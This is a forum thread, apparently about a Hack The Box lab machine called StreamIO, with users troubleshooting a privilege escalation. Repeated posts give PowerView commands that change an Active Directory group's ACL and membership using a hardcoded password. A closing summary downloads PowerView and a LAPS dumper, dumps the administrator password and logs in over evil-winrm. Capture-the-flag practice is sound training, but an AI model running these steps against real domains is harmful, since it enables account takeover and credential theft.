Posts: 56 Threads: 0 Joined: N/A (June 6, 2022, 01:25 PM)c0usc0us Wrote: Are these the correct commands to run ?
$SecPassword = ConvertTo-SecureString 'JDg0dd1s@d0p3cr3@t0r' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('JDgodd', $SecPassword)
Add-DomainObjectAcl -Credential $Cred -TargetIdentity "Core Staff" -Rights WriteMembers
Add-DomainGroupMember -Identity 'Core Staff' -Members 'nikk37' -Credential $Cred
My shell keeps hanging Add-DomainObjectAcl From the Add-DomainObjectAcl documentation: ''' -PrincipalIdentity A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local), SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201) for the domain principal to add for the ACL. *Required*. Wildcards accepted. ''' Looks like you're missing a required parameter. Posts: 36 Threads: 0 Joined: N/A (June 6, 2022, 02:00 PM)jon01 Wrote: (June 6, 2022, 01:30 PM)langetmama11 Wrote: (June 6, 2022, 01:25 PM)c0usc0us Wrote: Are these the correct commands to run ?
$SecPassword = ConvertTo-SecureString 'JDg0dd1s@d0p3cr3@t0r' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('JDgodd', $SecPassword)
Add-DomainObjectAcl -Credential $Cred -TargetIdentity "Core Staff" -Rights WriteMembers
Add-DomainGroupMember -Identity 'Core Staff' -Members 'nikk37' -Credential $Cred
My shell keeps hanging Add-DomainObjectAcl
My shell hangs with any Active Directory commands
I have tried with net user groups "Core Staff" /add JDgodd /domain
Same issue here
Set-DomainObjectOwner -Identity "core staff" -OwnerIdentity JDgodd -Cred $cred
Add-DomainObjectAcl -TargetIdentity "core staff" -PrincipalIdentity JDgodd -Cred $cred -Rights All
Add-DomainGroupMember -Identity 'core staff' -Members 'JDgodd' -Cred $cred
net group 'core staff'
//check hacktricks page Each command returns an error on name JDgodd, "unable to resolve principal" Posts: 56 Threads: 0 Joined: N/A (June 6, 2022, 02:06 PM)Toto Wrote: (June 6, 2022, 02:00 PM)jon01 Wrote: (June 6, 2022, 01:30 PM)langetmama11 Wrote: (June 6, 2022, 01:25 PM)c0usc0us Wrote: Are these the correct commands to run ?
$SecPassword = ConvertTo-SecureString 'JDg0dd1s@d0p3cr3@t0r' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('JDgodd', $SecPassword)
Add-DomainObjectAcl -Credential $Cred -TargetIdentity "Core Staff" -Rights WriteMembers
Add-DomainGroupMember -Identity 'Core Staff' -Members 'nikk37' -Credential $Cred
My shell keeps hanging Add-DomainObjectAcl
My shell hangs with any Active Directory commands
I have tried with net user groups "Core Staff" /add JDgodd /domain
Same issue here
Set-DomainObjectOwner -Identity "core staff" -OwnerIdentity JDgodd -Cred $cred
Add-DomainObjectAcl -TargetIdentity "core staff" -PrincipalIdentity JDgodd -Cred $cred -Rights All
Add-DomainGroupMember -Identity 'core staff' -Members 'JDgodd' -Cred $cred
net group 'core staff'
//check hacktricks page
Each command returns an error on name JDgodd, "unable to resolve principal" This worked: $SecPassword = ConvertTo-SecureString 'JDg0dd1s@d0p3cr3@t0r' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('streamio\JDgodd', $SecPassword)
Add-DomainObjectAcl -Credential $Cred -TargetIdentity "Core Staff" -principalidentity "streamio\jdgodd" -Rights WriteMembers
add-domaingroupmember -identity "CORE STAFF" -members "streamio\jdgodd" -credential $cred
(June 6, 2022, 02:16 PM)qwerty173 Wrote: Wow, what a machine. Thanks everyone for the help! Any tips after getting jdgodd into core staff? I can't seem to pivot to the account. Posts: 36 Threads: 0 Joined: N/A (June 6, 2022, 02:15 PM)karhu Wrote: (June 6, 2022, 02:06 PM)Toto Wrote: (June 6, 2022, 02:00 PM)jon01 Wrote: (June 6, 2022, 01:30 PM)langetmama11 Wrote: (June 6, 2022, 01:25 PM)c0usc0us Wrote: Are these the correct commands to run ?
$SecPassword = ConvertTo-SecureString 'JDg0dd1s@d0p3cr3@t0r' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('JDgodd', $SecPassword)
Add-DomainObjectAcl -Credential $Cred -TargetIdentity "Core Staff" -Rights WriteMembers
Add-DomainGroupMember -Identity 'Core Staff' -Members 'nikk37' -Credential $Cred
My shell keeps hanging Add-DomainObjectAcl
My shell hangs with any Active Directory commands
I have tried with net user groups "Core Staff" /add JDgodd /domain
Same issue here
Set-DomainObjectOwner -Identity "core staff" -OwnerIdentity JDgodd -Cred $cred
Add-DomainObjectAcl -TargetIdentity "core staff" -PrincipalIdentity JDgodd -Cred $cred -Rights All
Add-DomainGroupMember -Identity 'core staff' -Members 'JDgodd' -Cred $cred
net group 'core staff'
//check hacktricks page
Each command returns an error on name JDgodd, "unable to resolve principal"
This worked:
$SecPassword = ConvertTo-SecureString 'JDg0dd1s@d0p3cr3@t0r' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('streamio\JDgodd', $SecPassword)
Add-DomainObjectAcl -Credential $Cred -TargetIdentity "Core Staff" -principalidentity "streamio\jdgodd" -Rights WriteMembers
add-domaingroupmember -identity "CORE STAFF" -members "streamio\jdgodd" -credential $cred
(June 6, 2022, 02:16 PM)qwerty173 Wrote: Wow, what a machine. Thanks everyone for the help!
Any tips after getting jdgodd into core staff? I can't seem to pivot to the account. Last one doesn't for me, but I'll start from scratch using the first three, thanks Posts: 42 Threads: 0 Joined: N/A (June 6, 2022, 02:15 PM)karhu Wrote: (June 6, 2022, 02:06 PM)Toto Wrote: (June 6, 2022, 02:00 PM)jon01 Wrote: (June 6, 2022, 01:30 PM)langetmama11 Wrote: (June 6, 2022, 01:25 PM)c0usc0us Wrote: Are these the correct commands to run ?
$SecPassword = ConvertTo-SecureString 'JDg0dd1s@d0p3cr3@t0r' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('JDgodd', $SecPassword)
Add-DomainObjectAcl -Credential $Cred -TargetIdentity "Core Staff" -Rights WriteMembers
Add-DomainGroupMember -Identity 'Core Staff' -Members 'nikk37' -Credential $Cred
My shell keeps hanging Add-DomainObjectAcl
My shell hangs with any Active Directory commands
I have tried with net user groups "Core Staff" /add JDgodd /domain
Same issue here
Set-DomainObjectOwner -Identity "core staff" -OwnerIdentity JDgodd -Cred $cred
Add-DomainObjectAcl -TargetIdentity "core staff" -PrincipalIdentity JDgodd -Cred $cred -Rights All
Add-DomainGroupMember -Identity 'core staff' -Members 'JDgodd' -Cred $cred
net group 'core staff'
//check hacktricks page
Each command returns an error on name JDgodd, "unable to resolve principal"
This worked:
$SecPassword = ConvertTo-SecureString 'JDg0dd1s@d0p3cr3@t0r' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('streamio\JDgodd', $SecPassword)
Add-DomainObjectAcl -Credential $Cred -TargetIdentity "Core Staff" -principalidentity "streamio\jdgodd" -Rights WriteMembers
add-domaingroupmember -identity "CORE STAFF" -members "streamio\jdgodd" -credential $cred
(June 6, 2022, 02:16 PM)qwerty173 Wrote: Wow, what a machine. Thanks everyone for the help!
Any tips after getting jdgodd into core staff? I can't seem to pivot to the account. Dump LAPS - https://powersploit.readthedocs.io/en/latest/Recon/Get-DomainObject/ Posts: 56 Threads: 0 Joined: N/A (June 6, 2022, 02:26 PM)qwerty173 Wrote: (June 6, 2022, 02:15 PM)karhu Wrote: (June 6, 2022, 02:06 PM)Toto Wrote: (June 6, 2022, 02:00 PM)jon01 Wrote: (June 6, 2022, 01:30 PM)langetmama11 Wrote: My shell hangs with any Active Directory commands
I have tried with net user groups "Core Staff" /add JDgodd /domain
Same issue here
Set-DomainObjectOwner -Identity "core staff" -OwnerIdentity JDgodd -Cred $cred
Add-DomainObjectAcl -TargetIdentity "core staff" -PrincipalIdentity JDgodd -Cred $cred -Rights All
Add-DomainGroupMember -Identity 'core staff' -Members 'JDgodd' -Cred $cred
net group 'core staff'
//check hacktricks page
Each command returns an error on name JDgodd, "unable to resolve principal"
This worked:
$SecPassword = ConvertTo-SecureString 'JDg0dd1s@d0p3cr3@t0r' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('streamio\JDgodd', $SecPassword)
Add-DomainObjectAcl -Credential $Cred -TargetIdentity "Core Staff" -principalidentity "streamio\jdgodd" -Rights WriteMembers
add-domaingroupmember -identity "CORE STAFF" -members "streamio\jdgodd" -credential $cred
(June 6, 2022, 02:16 PM)qwerty173 Wrote: Wow, what a machine. Thanks everyone for the help!
Any tips after getting jdgodd into core staff? I can't seem to pivot to the account.
Dump LAPS - https://powersploit.readthedocs.io/en/latest/Recon/Get-DomainObject/ Yeah, I knew that. For some reason, once I figured out how to get jdgodd into core staff, my excitement got the better of me. Used laps.py to dump it and get Admin access. Really fun box. Thanks all for the tips and help! Posts: 11 Threads: 0 Joined: N/A (June 6, 2022, 02:20 PM)Toto Wrote: (June 6, 2022, 02:15 PM)karhu Wrote: (June 6, 2022, 02:06 PM)Toto Wrote: (June 6, 2022, 02:00 PM)jon01 Wrote: (June 6, 2022, 01:30 PM)langetmama11 Wrote: My shell hangs with any Active Directory commands
I have tried with net user groups "Core Staff" /add JDgodd /domain
Same issue here
Set-DomainObjectOwner -Identity "core staff" -OwnerIdentity JDgodd -Cred $cred
Add-DomainObjectAcl -TargetIdentity "core staff" -PrincipalIdentity JDgodd -Cred $cred -Rights All
Add-DomainGroupMember -Identity 'core staff' -Members 'JDgodd' -Cred $cred
net group 'core staff'
//check hacktricks page
Each command returns an error on name JDgodd, "unable to resolve principal"
This worked:
$SecPassword = ConvertTo-SecureString 'JDg0dd1s@d0p3cr3@t0r' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('streamio\JDgodd', $SecPassword)
Add-DomainObjectAcl -Credential $Cred -TargetIdentity "Core Staff" -principalidentity "streamio\jdgodd" -Rights WriteMembers
add-domaingroupmember -identity "CORE STAFF" -members "streamio\jdgodd" -credential $cred
(June 6, 2022, 02:16 PM)qwerty173 Wrote: Wow, what a machine. Thanks everyone for the help!
Any tips after getting jdgodd into core staff? I can't seem to pivot to the account.
Last one doesn't for me, but I'll start from scratch using the first three, thanks Add-DomainObjectAcl without specifying the rights works for me. Cheers. Posts: 17 Threads: 0 Joined: N/A In summary Download powerview.ps1 module to local computer wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1
Connection to nikk37 with evil-winrm evil-winrm -i streamio.htb -u nikk37 -p '[email protected]'
Upload and import module to the victim machine upload PowerView.ps1
Import-Module .\PowerView.ps1
Add to JDgodd to get access with laps $SecPassword = ConvertTo-SecureString 'JDg0dd1s@d0p3cr3@t0r' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('streamio\JDgodd', $SecPassword)
Add-DomainObjectAcl -Credential $Cred -TargetIdentity "Core Staff" -principalidentity "streamio\JDgodd"
Add-DomainGroupMember -identity "Core Staff" -members "streamio\JDgodd" -credential $Cred
On local computer download and run lapsdumper wget https://raw.githubusercontent.com/n00py/LAPSDumper/main/laps.py
python3 laps.py -u JDgodd -p 'JDg0dd1s@d0p3cr3@t0r' -d streamio.htb
With the password that results connect with evil-winrm as administrator evil-winrm -i streamio.htb -u Administrator -p '{passlaps.py}'
Posts: 46 Threads: 0 Joined: N/A (June 6, 2022, 04:07 PM)GatoGamer1155 Wrote: In summary
Download powerview.ps1 module to local computer
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1
Connection to nikk37 with evil-winrm
evil-winrm -i streamio.htb -u nikk37 -p '[email protected]'
Upload and import module to the victim machine
upload PowerView.ps1
Import-Module .\PowerView.ps1
Add to JDgodd to get access with laps
$SecPassword = ConvertTo-SecureString 'JDg0dd1s@d0p3cr3@t0r' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('streamio\JDgodd', $SecPassword)
Add-DomainObjectAcl -Credential $Cred -TargetIdentity "Core Staff" -principalidentity "streamio\JDgodd"
Add-DomainGroupMember -identity "Core Staff" -members "streamio\JDgodd" -credential $Cred
On local computer download and run lapsdumper
wget https://raw.githubusercontent.com/n00py/LAPSDumper/main/laps.py
python3 laps.py -u JDgodd -p 'JDg0dd1s@d0p3cr3@t0r' -d streamio.htb
With the password that results connect with evil-winrm as administrator
evil-winrm -i streamio.htb -u Administrator -p '{passlaps.py}'
Add-DomainObjectAcl -Credential $Cred -TargetIdentity "Core Staff"
it's taking forever evil-winrm just stuck after giving this cmd Posts: 74 Threads: 0 Joined: N/A (June 6, 2022, 04:07 PM)GatoGamer1155 Wrote: In summary
Download powerview.ps1 module to local computer
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1
Connection to nikk37 with evil-winrm
evil-winrm -i streamio.htb -u nikk37 -p '[email protected]'
Upload and import module to the victim machine
upload PowerView.ps1
Import-Module .\PowerView.ps1
Add to JDgodd to get access with laps
$SecPassword = ConvertTo-SecureString 'JDg0dd1s@d0p3cr3@t0r' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('streamio\JDgodd', $SecPassword)
Add-DomainObjectAcl -Credential $Cred -TargetIdentity "Core Staff" -principalidentity "streamio\JDgodd"
Add-DomainGroupMember -identity "Core Staff" -members "streamio\JDgodd" -credential $Cred
On local computer download and run lapsdumper
wget https://raw.githubusercontent.com/n00py/LAPSDumper/main/laps.py
python3 laps.py -u JDgodd -p 'JDg0dd1s@d0p3cr3@t0r' -d streamio.htb
With the password that results connect with evil-winrm as administrator
evil-winrm -i streamio.htb -u Administrator -p '{passlaps.py}'
Add-DomainObjectAcl just hangs, anyone have a solution for this? |
